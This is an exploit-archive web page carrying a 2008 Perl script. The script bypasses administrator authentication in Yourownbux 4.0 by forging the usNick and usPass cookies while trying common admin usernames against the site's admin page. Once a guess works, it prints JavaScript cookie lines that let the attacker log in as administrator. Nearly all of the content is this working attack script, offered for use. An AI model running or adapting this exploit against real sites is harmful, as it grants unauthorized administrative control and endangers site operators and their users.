首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
来源:www.vfcocus.net 作者:Tec-n0x 发布时间:2008-09-12  
#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request;

#+-------------------------------------------------------------------------------------------------+-#
#+ Yourownbux v4.0                   ------------------------------------------------------------+--+
#+ Cookie Modification Exploit -----------------------------------------------------------------++
#+ Discovered By: Tec-n0x | 04/9/2008 --------------------------------------------------------++
#
#+ Dropsec.com
#
#+ Modify The Line 39, Adding More User's that can be the admin username------------+
#+
# + Gr33tz: Celciuz, OzX, N.O.X, MurdeR, Syst3m-c0d3r && All Friends --++
#+-------------------------------------------------------------+----------------------------------------#



system("clear");

print "
# Yourownbux v4.0 Cookie Modification Exploit\n# Discovered By: Tec-n0x\n\n# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com
\n\n";
print "Target [ Example: www.sitedemo.com ] :\n> ";
$target = <STDIN>;
chop($target);

if($target =~ m/www\.(.*)\.(.*)/) {

$other = $1;
check1($target);

} else {
print "\nInvalid Target.";
exit();
}

sub explote {

@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other");
# Add Posible Users.

$check = shift;

foreach $user (@tryusers) {

$pass = "Tec-n0x";

print "\n\tTrying > $user\n";

$browser = LWP::UserAgent->new();
$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
$browser->default_header("Cookie" => "usNick=$user; usPass=$pass");
$get = HTTP::Request->new(GET => $check);
$resp = $browser->request($get);
$content = $resp->content();

@code = split("\n",$content);

foreach $checka (@code) {

if($checka =~ m/Emails|Served|Workload|Overview/) {

system("clear");

print "Succesfull EXPLOTED ...!!\n\nValid Username: $user\n\nGo to: $check\n\n And Put this on your browser:";

$vd = "javascript\:document\.cookie = \"usNick=$user\; path=\/\"\;";
$vda = "javascript\:document\.cookie = \"usPass=Dropsec\.com\; path=\/\"\;";

print "

+------------------------------------+
+ $vd\n+ $vda
+------------------------------------+
";


$yes = 1;

exit();

}
}
}

if($yes != 1) {

print "\n\n\nExploit Failed";

exit();

}

}
sub check1 {

$target = shift;

$check = "http\:\/\/$target\/admin\/index\.php";

$browser = LWP::UserAgent->new();
$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
$get = HTTP::Request->new(GET => $check);
$resp = $browser->request($get);
$content = $resp->content();

@code = split("\n",$content);

foreach $checka (@code) {

if($checka =~ m/You must login as administrator to access this page/) {

print "Check 1 [ OK ]\n";

$success = 1;

explote($check);

}

}

if($sucess != 1) {

print "Failed";

exit();

}

}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Maxthon Browser 2.1.4.443 UNIC
·minb 0.1.0 Remote Code Executi
·pLink 2.07 (linkto.php id) Rem
·phsBlog 0.2 Bypass SQL Injecti
·Sports Clubs Web Panel 0.0.1 R
·Easy Photo Gallery 2.1 XSS/FD/
·Windows Media Encoder wmex.dll
·Adobe Acrobat 9 ActiveX Remote
·The Personal FTP Server 6.0f R
·CzarNews <= 1.20 (Cookie) Remo
·MS Windows WRITE_ANDX SMB comm
·Wordpress 2.6.1 (SQL Column Tr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved